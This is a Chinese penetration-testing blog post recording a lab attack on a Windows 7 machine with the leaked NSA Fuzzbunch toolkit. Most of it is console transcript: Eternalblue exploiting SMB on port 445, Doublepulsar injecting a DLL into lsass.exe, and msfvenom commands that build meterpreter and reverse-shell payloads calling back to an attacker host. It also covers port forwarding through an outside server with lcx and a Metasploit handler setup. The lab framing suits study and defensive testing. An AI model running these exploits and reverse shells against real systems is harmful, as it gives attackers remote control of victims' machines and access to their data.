您当前位置: 首页 » 渗透技巧 » NSA方程式工具实战测试(Eternalblue)

NSA方程式工具实战测试(Eternalblue)

2017年4月15日 | 发表评论(0) 查看评论

一、环境:

靶机:win7 IP:192.168.208.128

攻击机: win2003 IP:192.168.208.164

在攻击机中需要python2.6环境和安装pywin32

python-2.6.6.msi

https://www.python.org/download/releases/2.6.6/

pywin32-221.win-amd64-py2.6.exe

https://sourceforge.net/projects/pywin32/files/pywin32/Build%20221/

二、攻击过程

下载方程式的工具后需要在当前目录建立listeningposts,之后程序才能正常使用,需要输入的地方全部加粗了,没有的地方直接回车默认就行

C:\Python26>python “C:\Documents and Settings\Administrator\桌面\windows\fb.py”

–[ Version 3.5.1

[*] Loading Plugins
[*] Initializing Fuzzbunch v3.5.1
[*] Adding Global Variables
[+] Set ResourcesDir => D:\DSZOPSDISK\Resources
[+] Set Color => True
[+] Set ShowHiddenParameters => False
[+] Set NetworkTimeout => 60
[+] Set LogDir => D:\logs
[*] Autorun ON

ImplantConfig Autorun List
==========================

0) prompt confirm
1) execute
Exploit Autorun List
====================

0) apply
1) touch all
2) prompt confirm
3) execute
Special Autorun List
====================

0) apply
1) touch all
2) prompt confirm
3) execute
Payload Autorun List
====================

0) apply
1) prompt confirm
2) execute
[+] Set FbStorage => C:\Documents and Settings\Administrator\桌面\windows\storag
e

[*] Retargetting Session

[?] Default Target IP Address [] : 192.168.208.128   // 靶机IP
[?] Default Callback IP Address [] : 192.168.208.164 //反弹IP
[?] Use Redirection [yes] : no

[?] Base Log directory [D:\logs] : c:\d
[*] Checking c:\d for projects
Index Project
—– ——-
0 Create a New Project

[?] Project [0] : 0 //新建一个项目
[?] New Project Name : test //项目名称
[?] Set target log directory to ‘c:\d\test\z192.168.208.128’? [Yes] :

[*] Initializing Global State
[+] Set TargetIp => 192.168.208.128
[+] Set CallbackIp => 192.168.208.124

[!] Redirection OFF
[+] Set LogDir => c:\d\test\z192.168.208.128
[+] Set Project => test

fb >

载入之后开始使用NSA提供的模块进行测试,这里以Eternalblue为例

fb > use Eternalblue //调用Eternalblue模块

[!] Entering Plugin Context :: Eternalblue
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 192.168.208.128

[*] Applying Session Parameters
[*] Running Exploit Touches
[!] Enter Prompt Mode :: Eternalblue

Module: Eternalblue
===================

Name Value
—- —–
NetworkTimeout 60
TargetIp 192.168.208.128
TargetPort 445
VerifyTarget True
VerifyBackdoor True
MaxExploitAttempts 3
GroomAllocations 12
Target WIN72K8R2

[!] plugin variables are valid
[?] Prompt For Variable Settings? [Yes] :

[*] NetworkTimeout :: Timeout for blocking network calls (in seconds). Use -1 f
or no timeout.

[?] NetworkTimeout [60] :

[*] TargetIp :: Target IP Address

[?] TargetIp [192.168.208.128] :

[*] TargetPort :: Port used by the SMB service for exploit connection

[?] TargetPort [445] :

[*] VerifyTarget :: Validate the SMB string from target against the target sele
cted before exploitation.

[?] VerifyTarget [True] :

[*] VerifyBackdoor :: Validate the presence of the DOUBLE PULSAR backdoor befor
e throwing. This option must be enabled for multiple exploit attempts.

[?] VerifyBackdoor [True] :

[*] MaxExploitAttempts :: Number of times to attempt the exploit and groom. Dis
abled for XP/2K3.

[?] MaxExploitAttempts [3] :

[*] GroomAllocations :: Number of large SMBv2 buffers (Vista+) or SessionSetup
allocations (XK/2K3) to do.

[?] GroomAllocations [12] :

[*] Target :: Operating System, Service Pack, and Architecture of target OS

0) XP Windows XP 32-Bit All Service Packs
*1) WIN72K8R2 Windows 7 and 2008 R2 32-Bit and 64-Bit All Service Packs

[?] Target [1] : 0 //根据靶机实际情况选择xp或者win7 2k8
[+] Set Target => XP
[!] Preparing to Execute Eternalblue

[*] Mode :: Delivery mechanism

*0) DANE Forward deployment via DARINGNEOPHYTE
1) FB Traditional deployment from within FUZZBUNCH

[?] Mode [0] : 1 //传输模式
[+] Run Mode: FB

[?] This will execute locally like traditional Fuzzbunch plugins. Are you sure?
(y/n) [Yes] :
[*] Redirection OFF

[+] Configure Plugin Local Tunnels
[+] Local Tunnel – local-tunnel-1
[?] Destination IP [192.168.208.128] :
[?] Destination Port [445] :
[+] (TCP) Local 192.168.208.128:445

[+] Configure Plugin Remote Tunnels
Module: Eternalblue
===================

Name Value
—- —–
DaveProxyPort 0
NetworkTimeout 60
TargetIp 192.168.208.128
TargetPort 445
VerifyTarget True
VerifyBackdoor True
MaxExploitAttempts 3
GroomAllocations 12
ShellcodeBuffer
Target XP

[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[*] Connecting to target for exploitation.
[+] Connection established for exploitation.
[*] Pinging backdoor…
[+] Backdoor returned code: 10 – Success!
[+] Ping returned Target architecture: x64 (64-bit)
[+] Backdoor is already installed — nothing to be done.
[*] CORE sent serialized output blob (2 bytes):
0x00000000 08 01 ..
[*] Received output parameters from CORE
[+] CORE terminated with status code 0x00000000
[+] Eternalblue Succeeded

fb Special (Eternalblue) >

 

[+] Eternalblue Succeeded 这里已经植入了后门,然后使用Doublepulsar进行连接后门

fb Special (Eternalblue) > use Doublepulsar //调用模块

[!] Entering Plugin Context :: Doublepulsar
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 192.168.208.128

[*] Applying Session Parameters

[!] Enter Prompt Mode :: Doublepulsar

Module: Doublepulsar
====================

Name Value
—- —–
NetworkTimeout 60
TargetIp 192.168.208.128
TargetPort 445
OutputFile
Protocol SMB
Architecture x86
Function OutputInstall

[!] Plugin Variables are NOT Valid
[?] Prompt For Variable Settings? [Yes] :

[*] NetworkTimeout :: Timeout for blocking network calls (in seconds). Use -1
for no timeout.

[?] NetworkTimeout [60] :

[*] TargetIp :: Target IP Address

[?] TargetIp [192.168.208.128] :

[*] TargetPort :: Port used by the Double Pulsar back door

[?] TargetPort [445] :

[*] Protocol :: Protocol for the backdoor to speak

*0) SMB Ring 0 SMB (TCP 445) backdoor
1) RDP Ring 0 RDP (TCP 3389) backdoor

[?] Protocol [0] : 0 //选择连接后门模式

[*] Architecture :: Architecture of the target OS

*0) x86 x86 32-bits
1) x64 x64 64-bits

[?] Architecture [0] :0 //选择靶机版本

[*] Function :: Operation for backdoor to perform

*0) OutputInstall Only output the install shellcode to a binary file on d
isk.
1) Ping Test for presence of backdoor
2) RunDLL Use an APC to inject a DLL into a user mode process.
3) RunShellcode Run raw shellcode
4) Uninstall Remove’s backdoor from system

[?] Function [0] :

这里分成了4个选项,第一个是测试ping后门,第二个是执行我们的dll,我这里选择的是2,使用的是msf生成的payload

root@am0s:~# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.208.129 LPORT 5555 -f dll >ss.dll  //生成反弹shell

 

[?] Function [0] : 2 // 运行自编译dll
[+] Set Function => RunDLL

[*] DllPayload :: DLL to inject into user mode

[?] DllPayload [] : c:\ss.dll //dll地址
[+] Set DllPayload => c:\ss.dll

[*] DllOrdinal :: The exported ordinal number of the DLL being injected to call
[?] DllOrdinal [1] :

[*] ProcessName :: Name of process to inject into

[?] ProcessName [lsass.exe] :

[*] ProcessCommandLine :: Command line of process to inject into

[?] ProcessCommandLine [] :
[!] Preparing to Execute Doublepulsar
[*] Redirection OFF

[+] Configure Plugin Local Tunnels
[+] Local Tunnel – local-tunnel-1
[?] Destination IP [192.168.208.128] :
[?] Destination Port [445] :
[+] (TCP) Local 192.168.208.128:445

[+] Configure Plugin Remote Tunnels
Module: Doublepulsar
====================

Name Value
—- —–
NetworkTimeout 60
TargetIp 192.168.208.128
TargetPort 445
DllPayload c:\ss.dll
DllOrdinal 1
ProcessName lsass.exe
ProcessCommandLine
Protocol SMB
Architecture x86
Function RunDLL

[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[+] Selected Protocol SMB
[.] Connecting to target…
[+] Connected to target, pinging backdoor…
[+] Backdoor returned code: 10 – Success!
[+] Ping returned Target architecture: x64 (64-bit) – XOR Key: 0xD977D3C
E
SMB Connection string is: Windows 7 Ultimate 7601 Service Pack 1
Target OS is: 7 x64
Target SP is: 1
[+] Backdoor installed
[+] DLL built
[.] Sending shellcode to inject DLL
[+] Backdoor returned code: 10 – Success!
[+] Backdoor returned code: 10 – Success!
[+] Backdoor returned code: 10 – Success!
[+] Command completed successfully
[+] Doublepulsar Succeeded

fb Payload (Doublepulsar) >

 

[+] Doublepulsar Succeeded 看出来已经执行成功了,我的msf也拿到了meterpreter,至此渗透结束

 

三、补充

虚拟机中的msf是内网,如果和攻击机的内网进行连接时,需要一个外网服务器进行转发。

root@am0s:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=3333 -f exe >/root/Desktop/ss.exe

之后在外网服务器使用lcx进行接收和转发

lcx -listen 3333 5555

然后使用msf进行exploit

msf > use exploit/multi/handler

Msf exploit(handler) > set PAYLOAD windows/meterpreter/bind_tcp

Msf exploit(handler) >set LPORT 5555

Msf exploit(handler) >set RHOST x.x.x.x

Msf exploit(handler) >exploit

之后成功转发,实现msf的内网到内网

nc实现反弹

msfvenom -p windows/x64/shell_reverse_tcp   LHOST=x.x.x.x LPORT=8888 -f dll > shell.dll

 

 

 

 

 

分类:

渗透技巧

| 标签:

,

发表评论?

0 条评论。

发表评论


注意 - 你可以用以下 HTML tags and attributes:
<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code class="" title="" data-url=""> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> <pre class="" title="" data-url=""> <span class="" title="" data-url="">